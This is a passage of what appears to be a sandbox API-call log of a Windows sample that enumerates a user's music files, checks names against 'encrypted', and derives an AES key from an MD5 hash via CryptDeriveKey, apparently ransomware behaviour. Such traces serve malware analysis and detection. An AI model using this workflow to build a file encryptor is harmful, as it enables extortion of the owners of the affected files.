ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x44983720, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E6Du.wav", cAlternateFileName="")) returned 0x7c20c0 [0038.771] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.771] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uBt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DHh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hh8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VkXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kXOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XOg3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Og3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E6Du.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0038.773] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.773] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0038.773] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.773] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.773] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.773] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.773] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.773] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.773] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.773] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x44983720, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="E6Du.wav", cAlternateFileName="")) returned 0x7c2240 [0038.773] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.774] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.774] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.774] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.774] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.774] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.774] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.775] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0038.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.775] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.775] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.775] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.776] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.776] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.776] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.776] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.776] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.776] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.776] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.777] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.777] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.777] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.777] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.777] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.777] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.777] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.778] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.778] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.778] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.778] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.778] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.778] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.778] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0038.778] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 